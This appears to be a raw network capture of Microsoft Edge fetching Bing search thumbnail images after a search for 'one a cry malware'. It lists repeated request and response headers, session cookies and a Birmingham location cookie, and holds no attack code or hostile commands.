accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6580
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b99b
GET

https://www.bing.com/th?id=OSK.f44b5cc5f3a798fb2272f017831fef31&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.f44b5cc5f3a798fb2272f017831fef31&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 923
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bcc49ac4107b20b724b59378782
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Ss0M9p/o+pOrEIeHlTPD+40TW+Ga+EC2qXcK8c+q+VU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:12 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b930
GET

https://www.bing.com/th?id=OSK.e616e429f6447765ffdccedc36ee8fb4&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.e616e429f6447765ffdccedc36ee8fb4&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 15750
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b99d
GET

https://www.bing.com/th?id=OSK.52037a59c29fb07bc8966c1ea7d62d5a&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.52037a59c29fb07bc8966c1ea7d62d5a&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8044
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491b99c
GET

https://www.bing.com/th?id=OSK.fc102480767bb1d4bc5344737823965b&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.fc102480767bb1d4bc5344737823965b&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199052.1491ba40
GET

https://www.bing.com/th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:13 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199053.1491c0f8
GET

https://www.bing.com/th?id=OSK.fc102480767bb1d4bc5344737823965b&w=120&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.fc102480767bb1d4bc5344737823965b&w=120&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 742
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bcdd70d4562bfbdf2a1d975f966
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
